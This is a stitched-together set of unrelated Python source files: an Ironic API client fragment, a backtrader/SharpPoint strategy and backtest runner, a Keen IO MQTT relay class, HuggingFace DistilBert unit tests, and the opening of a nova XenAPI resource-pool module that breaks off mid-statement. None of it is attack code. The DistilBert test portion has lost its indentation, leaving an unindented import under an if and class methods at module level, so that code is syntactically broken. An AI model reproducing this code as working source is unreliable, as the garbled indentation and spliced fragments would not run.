        :returns: A tuple with the server response and the serialized patched
            object.
        """
        uri = self._get_uri(resource, uuid)
        patch_body = json.dumps(patch_object)
        resp, body = self.patch(uri, body=patch_body)
        self.expected_success(200, resp.status)
        return resp, self.deserialize(body)

    @handle_errors
    def get_api_description(self):
        """Retrieves all versions of the Ironic API."""
        return self._list_request('', permanent=True)

    @handle_errors
    def get_version_description(self, version='v1'):
        """Retrieves the description of the API.

        :param version: The version of the API. Default: 'v1'.
        :returns: Serialized description of API resources.
        """
        return self._list_request(version, permanent=True)

    def _put_request(self, resource, put_object):
        """Update specified resource with a PUT request carrying a JSON body."""
        uri = self._get_uri(resource)
        put_body = json.dumps(put_object)
        resp, body = self.put(uri, body=put_body)
        self.expected_success([202, 204], resp.status)
        return resp, body
| |
import sys
import os
import io
import base64
import matplotlib
matplotlib.use('Agg', warn=False, force=True)
import backtrader as bt
import matplotlib.pyplot as plt
from backtrader.plot.plot import Plot
from multiprocessing import Process, Queue
import logging
import pprint
import copy
import inspect
# must import first to initialize metaclass
from spfeed import SharpPointCSVData
from spbroker import SharpPointBroker
from spbacktester import SharpPointBackTester
import spstore
import strategy.strategylist
import datetime
from pytz import timezone
import traceback
import jitter
def check_params(kwargs, slist):
    """Raise ValueError if any key in *slist* is absent, None, or '' in *kwargs*."""
    for key in slist:
        value = kwargs.get(key)
        if value is None or value == '':
            raise ValueError('missing %s' % str(key))
def run_strategy(kwargs, q):
    """Run a live trading strategy, reporting its status via queue ``q``.

    Requires 'strategy', 'dataname' and 'id' keys in ``kwargs``.  All output
    is appended to a per-run log file; a status tuple
    (strategy, id, "done"|"error", detail) is put on ``q`` when the run
    finishes, and any exception is re-raised after being logged.
    """
    f = None
    try:
        check_params(kwargs, ['strategy', 'dataname', 'id'])
        # Line-buffered (bufsize=1) append-mode log next to this module.
        modpath = os.path.dirname(os.path.realpath(__file__))
        logpath = os.path.join(modpath, '../data/log-%s.txt' %
                               (str(kwargs['id'])))
        f = open(logpath, "a", 1)
        stratargs = {}
        module = strategy.strategylist.dispatch[kwargs['strategy']]
        stratparams = module.params._getpairs()
        # Coerce incoming (typically string) values to the type of the
        # strategy parameter's declared default.
        for k, v in kwargs.items():
            if k in stratparams:
                s = stratparams[k]
                if isinstance(s, int):
                    stratargs[k] = int(v)
                elif isinstance(s, float):
                    stratargs[k] = float(v)
                else:
                    stratargs[k] = v
        stratargs['log'] = f
        stratargs['strategy'] = module
        cerebro = bt.Cerebro()
        cerebro.addstrategy(**stratargs)
        store = spstore.SharpPointStore(log=f)
        broker = store.getbroker()
        cerebro.setbroker(broker)
        # Create a Data Feed
        data = store.getdata(**kwargs)
        # Second feed replays the same data compressed into 5-minute bars.
        data2 = bt.DataClone(dataname=data)
        data2.addfilter(bt.ReplayerMinutes, compression=5)
        cerebro.adddata(data)
        cerebro.adddata(data2)
        # Print out the starting conditions
        print('Starting strategy "{}" at "{}"'.format(kwargs['strategy'],
                                                      datetime.datetime.now()),
              file=f)
        print('Using module file "{}"'.format(inspect.getsourcefile(module)),
              file=f)
        print('{}'.format(pprint.pformat(kwargs)), file=f)
        # Run over everything
        cerebro.run()
        # Print out the final result
        print('Finishing strategy "{}" at "{}"'.format(kwargs['strategy'],
                                                       datetime.datetime.now()),
              file=f)
        f.close()
        q.put((kwargs['strategy'], kwargs['id'], "done", ""))
        return None
    except:
        # Log the traceback both to the run log (if open) and stdout, notify
        # the parent via the queue, then re-raise for the caller/process.
        if f is not None:
            print(traceback.format_exc(), file=f)
            f.close()
        print(traceback.format_exc())
        q.put((kwargs['strategy'], kwargs['id'], "error",
               repr(sys.exc_info())))
        raise
def parse_date(s):
    """Parse a 'YYYY-MM-DD HH:MM[:SS]' string into a naive datetime."""
    date_part, time_part = s.split()
    fields = [int(piece) for piece in date_part.split('-')]
    fields.extend(int(piece) for piece in time_part.split(':'))
    return datetime.datetime(*fields)
def run_backtest(kwargs):
    """Run a single backtest synchronously and return an HTML report.

    Requires 'strategy' and 'dataname' keys in ``kwargs``; also reads
    'id', 'jitter', and optional 'backtest', 'backtest_start_time',
    'backtest_end_time', 'initial_cash' and 'plot' entries.  The report
    embeds an SVG chart (unless plot == "none") and the captured log.
    """
    check_params(kwargs, ['strategy', 'dataname'])
    stratargs = {}
    # All strategy/broker logging is captured in-memory for the report.
    f = io.StringIO()
    module = strategy.strategylist.dispatch[kwargs['strategy']]
    stratparams = module.params._getpairs()
    # Coerce incoming (typically string) values to the type of the
    # strategy parameter's declared default.
    for k, v in kwargs.items():
        if k in stratparams:
            s = stratparams[k]
            if isinstance(s, int):
                stratargs[k] = int(v)
            elif isinstance(s, float):
                stratargs[k] = float(v)
            else:
                stratargs[k] = v
    stratargs['log'] = f
    stratargs['strategy'] = module
    cerebro = bt.Cerebro()
    cerebro.addstrategy(**stratargs)
    store = spstore.SharpPointStore(log=f)
    broker = store.getbroker(backtest=kwargs.get('backtest', True))
    cerebro.setbroker(broker)
    # Copy the kwargs so the date-range keys only affect the data feed.
    feedargs = copy.copy(kwargs)
    if kwargs.get('backtest_start_time', '').strip() != '':
        feedargs['fromdate'] = parse_date(kwargs['backtest_start_time'])
    if kwargs.get('backtest_end_time', '').strip() != '':
        feedargs['todate'] = parse_date(kwargs['backtest_end_time'])
    # Create a Data Feed
    data = store.getdata(**feedargs)
    # Optional price jitter (>= 0 enables it) to stress-test the strategy.
    if float(kwargs['jitter']) >= 0.0:
        data.addfilter(jitter.JitterFilter,
                       jitter=float(kwargs['jitter']))
    # Second feed replays the same data compressed into 5-minute bars.
    data2 = bt.DataClone(dataname=data)
    data2.addfilter(bt.ReplayerMinutes, compression=5)
    cerebro.adddata(data)
    cerebro.adddata(data2)
    # Set the commission - 0.1% ... divide by 100 to remove the %
    initial_cash = kwargs.get("initial_cash", None)
    if initial_cash is not None:
        cerebro.broker.setcash(float(initial_cash))
    # cerebro.broker.setcommission(commission=0.0)
    # Print out the starting conditions
    print('Starting strategy "{}" at "{}"'.format(kwargs['strategy'],
                                                  datetime.datetime.now()),
          file=f)
    print('Using module file "{}"'.format(inspect.getsourcefile(module)),
          file=f)
    print('{}'.format(pprint.pformat(kwargs)), file=f)
    print('Starting Portfolio Value: %.2f' % cerebro.broker.getvalue(), file=f)
    # Run over everything
    cerebro.run()
    imgdata = io.BytesIO()
    plot_type = kwargs.get("plot", "candle")
    if plot_type != "none":
        # Render the chart to an in-memory SVG for embedding in the report.
        plotter = Plot(style='candle', bardownfill=False)
        cerebro.plot(plotter)
        plt.savefig(imgdata, format='svg')
    # Print out the final result
    print('Final Portfolio Value: %.2f' % cerebro.broker.getvalue(),
          file=f)
    print('Finishing strategy "{}" at "{}"'.format(kwargs['strategy'],
                                                   datetime.datetime.now()),
          file=f)
    retval = """
<html>
<head>
<title>Backtest - {}</title>
</head>
<body>
""".format(kwargs['id'])
    if plot_type != "none":
        retval += '<img src="data:image/svg+xml;base64,%s" /><br>' % \
            base64.b64encode(imgdata.getvalue()).decode('ascii')
    retval += '<pre>%s</pre></body></html>' % f.getvalue()
    imgdata.close()
    plt.close('all')
    f.close()
    return retval
def run(kwargs):
    """Launch a live strategy run in a daemonized subprocess.

    Mutates *kwargs* with live-mode flags, then spawns run_strategy.
    Returns a (process, queue) pair; the queue receives a status tuple
    when the strategy finishes or errors out.
    """
    status_queue = Queue()
    kwargs['newdata'] = True
    kwargs['keepalive'] = True
    kwargs['streaming'] = True
    kwargs.setdefault('loglevel', logging.WARNING)
    kwargs.setdefault('tickersource', "ticker-%{instrument}.txt")
    worker = Process(target=run_strategy,
                     args=(kwargs, status_queue))
    worker.daemon = True
    worker.start()
    return (worker, status_queue)
def backtest(kwargs):
    """Run a backtest synchronously; return its HTML report.

    On failure returns the traceback wrapped in a <pre> block instead of
    raising, so web callers always get renderable output.
    """
    kwargs['newdata'] = False
    kwargs['keepalive'] = False
    if 'loglevel' not in kwargs:
        kwargs['loglevel'] = logging.WARNING
    kwargs['streaming'] = False
    try:
        return run_backtest(kwargs)
    # BUG FIX: the previous bare `except:` also swallowed SystemExit and
    # KeyboardInterrupt; only real errors should become an HTML report.
    except Exception:
        return "<pre>" + traceback.format_exc() + "</pre>"
def strategy_list():
    """Return the names of every registered strategy."""
    return [name for name in strategy.strategylist.dispatch]
def params(name):
    """Return the default parameter mapping of the named strategy."""
    module = strategy.strategylist.dispatch[name]
    return module.params._getpairs()
def headers(name):
    """Return the strategy's header descriptors, filling each missing
    'defaultData' entry from the strategy's default parameters."""
    header_rows = strategy.strategylist.dispatch[name].header_list()
    defaults = params(name)
    for row in header_rows:
        if 'defaultData' in row:
            continue
        field = row['field']
        if field in defaults:
            row['defaultData'] = defaults[field]
    return header_rows
class TimeFilter(object):
    """Accept or reject datetimes against an inclusive time-of-day window."""

    def __init__(self, a, b):
        # Window bounds, stored as seconds after midnight.
        self.start_time = self.string_to_seconds(a)
        self.end_time = self.string_to_seconds(b)

    @staticmethod
    def string_to_seconds(s):
        """Convert "HH:MM" or "HH:MM:SS" into seconds after midnight."""
        fields = s.split(":")
        total = int(fields[0]) * 3600 + int(fields[1]) * 60
        if len(fields) > 2:
            total += int(fields[2])
        return total

    @staticmethod
    def seconds_from_midnight(d):
        """Return the seconds (float) elapsed since *d*'s own midnight."""
        midnight = d.replace(hour=0, minute=0, second=0, microsecond=0)
        return (d - midnight).total_seconds()

    def intervals(self, a):
        """Return (seconds-of-day of *a*, window start, window end)."""
        return (self.seconds_from_midnight(a), self.start_time, self.end_time)

    def filter(self, a):
        """True when *a*'s time of day lies inside the window (inclusive)."""
        return self.start_time <= self.seconds_from_midnight(a) <= self.end_time
if __name__ == '__main__':
    # Smoke-test entry point for manual runs.
    print(params('sample'))
    print(params('sample').get('exitbars', None))
    print(TimeFilter.string_to_seconds("14:30"))
    # BUG FIX: run() takes a single kwargs dict; the old call
    # run("sample", 1, {'exitbars': 1}) passed three positional arguments
    # and raised TypeError.  NOTE(review): run_strategy also requires a
    # 'dataname' key — supply one for a complete live run.
    run({'strategy': 'sample', 'id': 1, 'exitbars': 1})
| |
""" Keen mqtt relay class """
import paho.mqtt.client as mqtt
import keen
import json
from datetime import datetime
import logging
logger = logging.getLogger('keenmqtt')
class KeenMQTT:
    """Relay MQTT messages into Keen IO event collections.

    Per-message pipeline: ``decode_payload`` -> ``process_collection`` ->
    ``process_topic`` -> ``process_payload`` -> ``process_time`` ->
    ``push_event``.  Each step may be overridden in a subclass; a step
    returning a falsy value cancels the event.
    """

    def __init__(self):
        # True once clients are wired up (setup / on_mqtt_connect).
        self.ready = False
        # True while the background MQTT loop is running (start / stop).
        self.running = False
        # Maps MQTT subscription patterns -> Keen IO collection names.
        self.collection_mapping = {}

    def setup(self, mqtt_client=None, keen_client=None, settings=None):
        """Setup the clients for this instance.

        Normally called with a settings object containing `keen` and `mqtt` keys
        with dictionary values of settings.

        Args:
            mqtt_client Optional[class]: An instance of a Paho MQTT client class.
            keen_client Optional[class]: An instance of a KeenClient.
            settings Optional[dict]: A settings dict, normally loaded from a config.yaml file.

        Return:
            None
        """
        if mqtt_client:
            self.mqtt_client = mqtt_client
            self.register_subscriptions()
        else:
            self.connect_mqtt_client(settings)
        if keen_client:
            self.keen_client = keen_client
        else:
            self.connect_keen(settings)
        if 'collection_mappings' in settings:
            for subscription in settings['collection_mappings']:
                collection = settings['collection_mappings'][subscription]
                self.add_collection_mapping(subscription, collection)
        self.ready = True

    def connect_mqtt_client(self, settings):
        """Setup MQTT client.

        Please note that the MQTT client will not actually connect until either ``step`` or ``start``
        has been called.

        Args:
            settings Optional[dict]: The settings object, such as one read from config.yaml

        Return:
            None
        """
        mqtt_settings = settings['mqtt']
        # Generate a random client id when none was configured.
        if 'client_id' not in mqtt_settings:
            import uuid
            mqtt_settings['client_id'] = str(uuid.uuid4())
        self.mqtt_client = mqtt.Client(mqtt_settings['client_id'])
        self.mqtt_client.on_message = self.on_mqtt_message
        self.mqtt_client.on_connect = self.on_mqtt_connect
        # Credentials are optional; an empty 'user' disables authentication.
        if 'user' in mqtt_settings and len(mqtt_settings['user']):
            self.mqtt_client.username_pw_set(mqtt_settings['user'], mqtt_settings['pass'])
        self.mqtt_client.connect(mqtt_settings['host'], mqtt_settings['port'])

    def connect_keen(self, settings):
        """Setup the Keen IO client.

        Args:
            settings Optional[dict]: The settings object, such as one read from config.yaml

        Return:
            None
        """
        if 'keen' in settings:
            self.keen_client = keen.KeenClient(**settings['keen'])
        else:
            # Fall back to the module-level keen API (configured via env vars).
            self.keen_client = keen

    def on_mqtt_connect(self, c, client, userdata, rc):
        """Called when an MQTT connection is made.

        See the Paho MQTT client documentation ``on_connect`` documentation for arguments.

        NOTE(review): paho's on_connect callback is invoked as
        (client, userdata, flags, rc); this bound method therefore receives
        those four values as (c, client, userdata, rc) — confirm against the
        paho version in use.
        """
        logger.info("MQTT Client connected")
        self.register_subscriptions()
        self.ready = True

    def register_subscriptions(self):
        """This should always be called since it re-subscribes after any
        unexpected disconnects.
        """
        for subscription in self.collection_mapping:
            self.mqtt_client.subscribe(subscription)

    def on_mqtt_message(self, mosq, obj, mqtt_message):
        """Called when an MQTT message is received.

        See the Paho MQTT client documentation ``on_message`` documentation for arguments.
        """
        topic = mqtt_message.topic
        payload = mqtt_message.payload
        messages = self.decode_payload(topic, payload)
        if len(messages):
            for message in messages:
                event = {}
                collection = self.process_collection(topic, message)
                # Each processing stage can veto the event by returning falsy.
                if collection:
                    if self.process_topic(event, topic):
                        if self.process_payload(event, topic, message):
                            if self.process_time(event, topic, message):
                                self.push_event(collection, event)

    def start(self):
        """Automatically loop in a background thread."""
        self.running = True
        self.mqtt_client.loop_start()

    def stop(self):
        """Disconnect and stop. """
        self.mqtt_client.loop_stop()
        self.running = False

    def step(self):
        """Do a single MQTT step.

        Use this if you're not running keenmqtt in a background thread with ``start``/``stop``
        """
        if self.running:
            raise BackgroundRunningException("Cannot perform a step whilst background loop is running.")
        self.mqtt_client.loop()

    def process_topic(self, event, topic):
        """Process an incoming MQTT message's topic string.

        If the topic contains pertinent information, such as the device ID or location,
        this method can be overridden to perform any translation. By default, a key called
        ``mqtt_topic`` containing the topic string will be added to the event dictionary.

        Args:
            event (dict): The event dictionary for this mqtt message.
            topic (str): The topic string.

        Return:
            bool: A Boolean indicating if this message should continue through the pipeline. Return
            ``False`` to cancel the processing of this event and stop it from being saved in keen.
        """
        event['mqtt_topic'] = topic
        return True

    def process_collection(self, topic, message):
        """Assign a collection to the MQTT message.

        By default will find a matching topic in the collection_mapping dictionary and return
        the associated string. Could also be based on event contents.

        Args:
            topic (str): The topic string.
            message (dict): The decoded message dictionary.

        Return:
            str: A string indicating the Keen IO collection which this event should be pushed to, or
            False if a matching event collection could not be found.
        """
        for subscription in self.collection_mapping:
            if mqtt.topic_matches_sub(subscription, topic):
                return self.collection_mapping[subscription]
        return False

    def add_collection_mapping(self, sub, collection):
        """Add a subscription to event collection mapping.

        This will override existing subscriptions if present.

        Args:
            sub (str): The string subscription pattern.
            collection (str): The string event collection.

        Return:
            None
        """
        self.collection_mapping[sub] = collection

    def decode_payload(self, topic, payload):
        """Decode the payload of an incoming MQTT payload.

        By default a JSON object is expected, however this method can be overridden to provide
        alternative means to extract a MQTT payload. For example, a binary format could be
        extracted here.

        Args:
            topic (str): The topic string.
            payload (str): Raw MQTT payload.

        Returns:
            An array of dictionaries containing the decoded MQTT payload.

        Raises:
            ValueError: When the JSON payload cannot be parsed.
        """
        return [json.loads(payload)]

    def process_payload(self, event, topic, message):
        """Process an incoming MQTT message's payload.

        Perform any required translations to the payload of the MQTT message, such as removing
        unwanted keys.  By default the whole decoded message is merged into the event.

        Args:
            event (dict): The event dictionary for this mqtt message.
            topic (str): The topic string.
            message (dict): the decoded MQTT payload

        Returns:
            bool: A Boolean indicating if this message should continue through the pipeline. Return
            ``False`` to cancel the processing of this event and stop it from being saved in Keen IO.
        """
        event.update(message)
        return True

    def process_time(self, event, topic, message):
        """Process the timestamp which will be sent to Keen IO.

        If the MQTT message contains time information which should be used instead of the event being
        timestamped by Keen IO, set it here.

        Args:
            event (dict): The event dictionary for this mqtt message.
            topic (str): The topic string.
            message (dict): The message dictionary.

        Returns:
            bool: A Boolean indicating if this message should continue through the pipeline. Return
            ``False`` to cancel the processing of this event and stop it from being saved in Keen IO.
        """
        iso_datetime = self.get_time(topic, message)
        if iso_datetime is not None:
            # Keen IO honors an override timestamp under the 'keen' key.
            event['keen'] = {
                "timestamp": iso_datetime
            }
        return True

    def get_time(self, topic, message):
        """Get the timestamp to send to Keen IO.

        This method is used to extract the timestamp from the MQTT message if required,
        or to generate a timestamp. By default, the current time will be fetched.

        Args:
            topic (str): The topic string.
            message (dict): The message dictionary.

        Returns:
            str: A string containing ISO-8601 string.
        """
        # NOTE(review): datetime.now() is naive local time — confirm whether
        # Keen IO expects UTC here.
        return datetime.now().isoformat()

    def push_event(self, collection, event):
        """Thin wrapper around Keen IO API object.

        Args:
            collection (str): The collection string to push to
            event (dict): The complete event to push

        Returns:
            None
        """
        # Sanity check only; assert is stripped when running under -O.
        assert self.ready == True
        logger.debug("Saving event to collection {collection}: '{event}'".format(collection=collection, event=event))
        self.keen_client.add_event(collection, event)
class BackgroundRunningException(Exception):
    """Raised when a foreground ``step`` is attempted while the background
    MQTT loop is already running."""
    pass
| |
# coding=utf-8
# Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from transformers import is_torch_available
from transformers.testing_utils import require_torch, slow, torch_device
from .test_configuration_common import ConfigTester
from .test_modeling_common import ModelTesterMixin, ids_tensor, random_attention_mask
if is_torch_available():
import torch
from transformers import (
DISTILBERT_PRETRAINED_MODEL_ARCHIVE_LIST,
DistilBertConfig,
DistilBertForMaskedLM,
DistilBertForMultipleChoice,
DistilBertForQuestionAnswering,
DistilBertForSequenceClassification,
DistilBertForTokenClassification,
DistilBertModel,
)
class DistilBertModelTester(object):
    def __init__(
        self,
        parent,
        batch_size=13,
        seq_length=7,
        is_training=True,
        use_input_mask=True,
        use_token_type_ids=False,
        use_labels=True,
        vocab_size=99,
        hidden_size=32,
        num_hidden_layers=5,
        num_attention_heads=4,
        intermediate_size=37,
        hidden_act="gelu",
        hidden_dropout_prob=0.1,
        attention_probs_dropout_prob=0.1,
        max_position_embeddings=512,
        type_vocab_size=16,
        type_sequence_label_size=2,
        initializer_range=0.02,
        num_labels=3,
        num_choices=4,
        scope=None,
    ):
        """Store the (deliberately tiny) model and input hyper-parameters.

        ``parent`` is the enclosing test case; its assert helpers are used
        by the create_and_check_* methods.
        """
        self.parent = parent
        self.batch_size = batch_size
        self.seq_length = seq_length
        self.is_training = is_training
        self.use_input_mask = use_input_mask
        self.use_token_type_ids = use_token_type_ids
        self.use_labels = use_labels
        self.vocab_size = vocab_size
        self.hidden_size = hidden_size
        self.num_hidden_layers = num_hidden_layers
        self.num_attention_heads = num_attention_heads
        self.intermediate_size = intermediate_size
        self.hidden_act = hidden_act
        self.hidden_dropout_prob = hidden_dropout_prob
        self.attention_probs_dropout_prob = attention_probs_dropout_prob
        self.max_position_embeddings = max_position_embeddings
        self.type_vocab_size = type_vocab_size
        self.type_sequence_label_size = type_sequence_label_size
        self.initializer_range = initializer_range
        self.num_labels = num_labels
        self.num_choices = num_choices
        self.scope = scope
    def prepare_config_and_inputs(self):
        """Build a tiny DistilBertConfig plus random input ids, mask and labels.

        Returns a 6-tuple: (config, input_ids, input_mask, sequence_labels,
        token_labels, choice_labels); the label entries are None unless
        ``use_labels`` is set, and the mask is None unless ``use_input_mask``.
        """
        input_ids = ids_tensor([self.batch_size, self.seq_length], self.vocab_size)

        input_mask = None
        if self.use_input_mask:
            input_mask = random_attention_mask([self.batch_size, self.seq_length])

        sequence_labels = None
        token_labels = None
        choice_labels = None
        if self.use_labels:
            sequence_labels = ids_tensor([self.batch_size], self.type_sequence_label_size)
            token_labels = ids_tensor([self.batch_size, self.seq_length], self.num_labels)
            choice_labels = ids_tensor([self.batch_size], self.num_choices)

        # Map the generic tester attributes onto DistilBERT's config names
        # (dim/n_layers/n_heads/hidden_dim instead of the BERT-style names).
        config = DistilBertConfig(
            vocab_size=self.vocab_size,
            dim=self.hidden_size,
            n_layers=self.num_hidden_layers,
            n_heads=self.num_attention_heads,
            hidden_dim=self.intermediate_size,
            hidden_act=self.hidden_act,
            dropout=self.hidden_dropout_prob,
            attention_dropout=self.attention_probs_dropout_prob,
            max_position_embeddings=self.max_position_embeddings,
            initializer_range=self.initializer_range,
        )

        return config, input_ids, input_mask, sequence_labels, token_labels, choice_labels
def create_and_check_distilbert_model(
self, config, input_ids, input_mask, sequence_labels, token_labels, choice_labels
):
model = DistilBertModel(config=config)
model.to(torch_device)
model.eval()
result = model(input_ids, input_mask)
result = model(input_ids)
self.parent.assertEqual(
result.last_hidden_state.shape, (self.batch_size, self.seq_length, self.hidden_size)
)
def create_and_check_distilbert_for_masked_lm(
    self, config, input_ids, input_mask, sequence_labels, token_labels, choice_labels
):
    """Check that the MLM head produces per-token vocabulary logits."""
    model = DistilBertForMaskedLM(config=config)
    model.to(torch_device)
    model.eval()
    output = model(input_ids, attention_mask=input_mask, labels=token_labels)
    self.parent.assertEqual(
        output.logits.shape, (self.batch_size, self.seq_length, self.vocab_size)
    )
def create_and_check_distilbert_for_question_answering(
    self, config, input_ids, input_mask, sequence_labels, token_labels, choice_labels
):
    """Check that the QA head produces per-token start/end span logits."""
    model = DistilBertForQuestionAnswering(config=config)
    model.to(torch_device)
    model.eval()
    output = model(
        input_ids,
        attention_mask=input_mask,
        start_positions=sequence_labels,
        end_positions=sequence_labels,
    )
    span_shape = (self.batch_size, self.seq_length)
    self.parent.assertEqual(output.start_logits.shape, span_shape)
    self.parent.assertEqual(output.end_logits.shape, span_shape)
def create_and_check_distilbert_for_sequence_classification(
    self, config, input_ids, input_mask, sequence_labels, token_labels, choice_labels
):
    """Check that the sequence-classification head emits one logit row
    per example."""
    config.num_labels = self.num_labels
    model = DistilBertForSequenceClassification(config)
    model.to(torch_device)
    model.eval()
    output = model(input_ids, attention_mask=input_mask, labels=sequence_labels)
    self.parent.assertEqual(output.logits.shape, (self.batch_size, self.num_labels))
def create_and_check_distilbert_for_token_classification(
    self, config, input_ids, input_mask, sequence_labels, token_labels, choice_labels
):
    """Check that the token-classification head emits logits per token."""
    config.num_labels = self.num_labels
    model = DistilBertForTokenClassification(config=config)
    model.to(torch_device)
    model.eval()
    output = model(input_ids, attention_mask=input_mask, labels=token_labels)
    self.parent.assertEqual(
        output.logits.shape, (self.batch_size, self.seq_length, self.num_labels)
    )
def create_and_check_distilbert_for_multiple_choice(
    self, config, input_ids, input_mask, sequence_labels, token_labels, choice_labels
):
    """Check the multiple-choice head: inputs are tiled across a choice
    dimension and one logit per choice comes back."""
    config.num_choices = self.num_choices
    model = DistilBertForMultipleChoice(config=config)
    model.to(torch_device)
    model.eval()

    def tile_choices(tensor):
        # Replicate (batch, seq) -> (batch, num_choices, seq).
        return tensor.unsqueeze(1).expand(-1, self.num_choices, -1).contiguous()

    output = model(
        tile_choices(input_ids),
        attention_mask=tile_choices(input_mask),
        labels=choice_labels,
    )
    self.parent.assertEqual(output.logits.shape, (self.batch_size, self.num_choices))
def prepare_config_and_inputs_for_common(self):
    """Adapt :meth:`prepare_config_and_inputs` to the (config, inputs_dict)
    shape expected by the shared ModelTesterMixin tests; labels are dropped."""
    config, input_ids, input_mask, *_ = self.prepare_config_and_inputs()
    return config, {"input_ids": input_ids, "attention_mask": input_mask}
@require_torch
class DistilBertModelTest(ModelTesterMixin, unittest.TestCase):
    """Standard test suite for the PyTorch DistilBert model family.

    Combines the shared ModelTesterMixin checks (configured via the class
    attributes below) with per-head checks driven by DistilBertModelTester.
    """

    # Model classes exercised by the common mixin tests; None when torch is
    # unavailable (the @require_torch decorator skips the suite in that case).
    all_model_classes = (
        (
            DistilBertModel,
            DistilBertForMaskedLM,
            DistilBertForMultipleChoice,
            DistilBertForQuestionAnswering,
            DistilBertForSequenceClassification,
            DistilBertForTokenClassification,
        )
        if is_torch_available()
        else None
    )
    # All of the above are also exercised by the torch.fx tracing tests.
    fx_ready_model_classes = all_model_classes
    # Feature flags consumed by ModelTesterMixin to enable optional checks.
    test_pruning = True
    test_torchscript = True
    test_resize_embeddings = True
    test_sequence_classification_problem_types = True

    def setUp(self):
        # dim=37 gives the config tester a non-default hidden size to verify.
        self.model_tester = DistilBertModelTester(self)
        self.config_tester = ConfigTester(self, config_class=DistilBertConfig, dim=37)

    def test_config(self):
        """Run the generic DistilBertConfig serialization/attribute checks."""
        self.config_tester.run_common_tests()

    def test_distilbert_model(self):
        config_and_inputs = self.model_tester.prepare_config_and_inputs()
        self.model_tester.create_and_check_distilbert_model(*config_and_inputs)

    def test_for_masked_lm(self):
        config_and_inputs = self.model_tester.prepare_config_and_inputs()
        self.model_tester.create_and_check_distilbert_for_masked_lm(*config_and_inputs)

    def test_for_question_answering(self):
        config_and_inputs = self.model_tester.prepare_config_and_inputs()
        self.model_tester.create_and_check_distilbert_for_question_answering(*config_and_inputs)

    def test_for_sequence_classification(self):
        config_and_inputs = self.model_tester.prepare_config_and_inputs()
        self.model_tester.create_and_check_distilbert_for_sequence_classification(*config_and_inputs)

    def test_for_token_classification(self):
        config_and_inputs = self.model_tester.prepare_config_and_inputs()
        self.model_tester.create_and_check_distilbert_for_token_classification(*config_and_inputs)

    def test_for_multiple_choice(self):
        config_and_inputs = self.model_tester.prepare_config_and_inputs()
        self.model_tester.create_and_check_distilbert_for_multiple_choice(*config_and_inputs)

    @slow
    def test_model_from_pretrained(self):
        """Smoke-test loading the first published checkpoint from the hub."""
        for model_name in DISTILBERT_PRETRAINED_MODEL_ARCHIVE_LIST[:1]:
            model = DistilBertModel.from_pretrained(model_name)
            self.assertIsNotNone(model)
@require_torch
class DistilBertModelIntergrationTest(unittest.TestCase):
    # NOTE(review): the class name misspells "Integration"; renaming would
    # change the externally visible test id, so it is left untouched here.

    @slow
    def test_inference_no_head_absolute_embedding(self):
        """Compare base-model hidden states against known-good reference values
        produced by the published distilbert-base-uncased checkpoint."""
        model = DistilBertModel.from_pretrained("distilbert-base-uncased")
        input_ids = torch.tensor([[0, 345, 232, 328, 740, 140, 1695, 69, 6078, 1588, 2]])
        attention_mask = torch.tensor([[0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]])
        output = model(input_ids, attention_mask=attention_mask)[0]
        expected_shape = torch.Size((1, 11, 768))
        self.assertEqual(output.shape, expected_shape)
        # Reference slice of the hidden states captured from a known-good run;
        # only positions/dims 1:4 are compared, within a 1e-4 tolerance.
        expected_slice = torch.tensor(
            [[[-0.1639, 0.3299, 0.1648], [-0.1746, 0.3289, 0.1710], [-0.1884, 0.3357, 0.1810]]]
        )
        self.assertTrue(torch.allclose(output[:, 1:4, 1:4], expected_slice, atol=1e-4))
| |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2012 Citrix Systems, Inc.
# Copyright 2010 OpenStack LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Management class for Pool-related functions (join, eject, etc).
"""
import json
import urlparse
from nova import db
from nova import exception
from nova import flags
from nova import log as logging
from nova import rpc
from nova.compute import aggregate_states
from nova.openstack.common import cfg
from nova.virt.xenapi import vm_utils
LOG = logging.getLogger("nova.virt.xenapi.pool")
xenapi_pool_opts = [
cfg.BoolOpt('use_join_force',
default=True,
help='To use for hosts with different CPUs'),
]
FLAGS = flags.FLAGS
FLAGS.register_opts(xenapi_pool_opts)
class ResourcePool(object):
    """
    Implements resource pool operations.

    Keeps a nova host aggregate in sync with a XenServer resource pool:
    pool creation/naming, joining subordinate hosts, and ejecting them.
    """
    def __init__(self, session):
        """Cache identifying details of the local XenServer host.

        :param session: XenAPI session wrapper; used for all host/pool calls.
        """
        self.XenAPI = session.get_imported_xenapi()
        host_ref = session.get_xenapi_host()
        host_rec = session.call_xenapi('host.get_record', host_ref)
        self._host_name = host_rec['hostname']
        self._host_addr = host_rec['address']
        self._host_uuid = host_rec['uuid']
        self._session = session

    def add_to_aggregate(self, context, aggregate, host, **kwargs):
        """Add a compute host to an aggregate.

        Behavior depends on where the call lands: the first host becomes the
        pool main; on the main, a later call joins the new host into the
        pool; on any other host the request is forwarded to the main.
        """
        if len(aggregate.hosts) == 1:
            # this is the first host of the pool -> make it main
            self._init_pool(aggregate.id, aggregate.name)
            # save metadata so that we can find the main again
            values = {
                'operational_state': aggregate_states.ACTIVE,
                'metadata': {'main_compute': host,
                             host: self._host_uuid},
                }
            db.aggregate_update(context, aggregate.id, values)
        else:
            # the pool is already up and running, we need to figure out
            # whether we can serve the request from this host or not.
            # NOTE(review): direct indexing assumes 'main_compute' metadata
            # was written by the first-host branch above; raises KeyError
            # otherwise — confirm against callers.
            main_compute = aggregate.metadetails['main_compute']
            if main_compute == FLAGS.host and main_compute != host:
                # this is the main -> do a pool-join
                # To this aim, nova compute on the subordinate has to go down.
                # NOTE: it is assumed that ONLY nova compute is running now
                self._join_subordinate(aggregate.id, host,
